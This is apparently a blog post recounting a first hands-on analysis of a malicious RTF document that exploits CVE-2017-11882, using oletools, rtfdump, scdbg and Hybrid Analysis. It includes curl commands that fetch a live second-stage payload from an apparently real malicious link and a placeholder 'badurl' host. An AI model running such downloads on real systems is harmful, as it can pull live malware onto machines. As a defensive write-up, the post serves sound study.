Skip to main content

Analysing a malware sample

· 3 min read

After learning the basics of malware analysis, I decided to challenge myself by analyzing a real-world sample. I picked a recent upload from Malware Bazaar, which had no tags at the time. My objective was to identify what type of malware it was and understand its behavior.

This is the sample: https://bazaar.abuse.ch/sample/613b4de5c0a4a0efc484e93eff8281250787bbe45e0652754eee9cbf1186cebb/

warning

Remember to perform malware analysis in a safe environment.

Initial Inspection

The file under analysis had a .doc extension, suggesting it was a Microsoft Word document. To extract metadata, I ran: olemeta sample.doc. However, this threw an exception: not an OLE2 structured storage file, meaning it wasn't a Word document.

Using Detect It Easy (DIE), I found that the file was actually an archive. After extracting its contents, I discovered it was an RTF (Rich Text Format) file, which I could also inspect in VS Code.

detect-it-easy

Next, I used oleid to check for embedded objects: oleid sample.doc. The results revealed an external relationship within the document. oleobj returned an object name and an external link, likely leading to a second-stage payload.

oleid

I attempted to retrieve the linked payload using curl. This request curl --output file_2.rtf https://agr.my/X7TO8b resulted in a redirect, so I followed it to get the actual file: curl --output file_2.rtf <redirected_url>.

Then, I uploaded the document to Hybrid Analysis, which identified CVE-2017-11882 as the exploit used.

  • https://www.hybrid-analysis.com/sample/5754ec2b05c1020060297b2b9b717e6d8ec01703d43e53dec323762d7b1b38da/67ead51d92d9e3292808211e
  • sha256: 5754ec2b05c1020060297b2b9b717e6d8ec01703d43e53dec323762d7b1b38da

CVE-2017-11882 is a vulnerability in Microsoft Equation Editor that allows attackers to execute arbitrary code when a malicious document is opened.

hybrid-analysis

Extracting the Payload from RTF

Since the second-stage file contained executable code, I needed to extract it. While doing some search, I found an article describing a similar case.

Following its guidance, I extracted the payload using:

rtfdump.py -F -s 1 -d ./example/file_2.rtf | oledump.py -s 1 -d > out.txt

rtfdump_oledump

Analyzing the Third-Stage Payload

The extracted payload was an obfuscated file. To analyze it, I used scdbg, a shellcode emulator that allows executing and analyzing shellcode in a controlled environment. I ran:

  • -r: report mode to log execution behavior,
  • -findsc: findsc mode to locate embedded shellcode.

scdbg

curl --output malicious.vbe badurl/vbe

I also used Cutter, an open-source reverse engineering platform, to analyze the shellcode. It appears to manipulate the byte order or reverse the string to decode data and load .NET assembly bytecode directly into memory.

From here the analysis becomes more complex as the payload needs to be deobfuscated.

I uploaded file malicious.vbe to Hybrid Analysis, which classified it as a Trojan: https://www.hybrid-analysis.com/sample/42e843cba5acfcc113932267d0bf11fbf973a474f40ae473d32a49243e7fc93d

Conclusion

This was my first hands-on malware analysis experience, and it helped me understand:

  • How malicious documents use external relationships to fetch additional payloads,
  • The exploitation of CVE-2017-11882 in RTF-based attacks,
  • Techniques for extracting embedded payloads from document files,
  • How multi-stage malware works, leading to Trojan infections.

Resources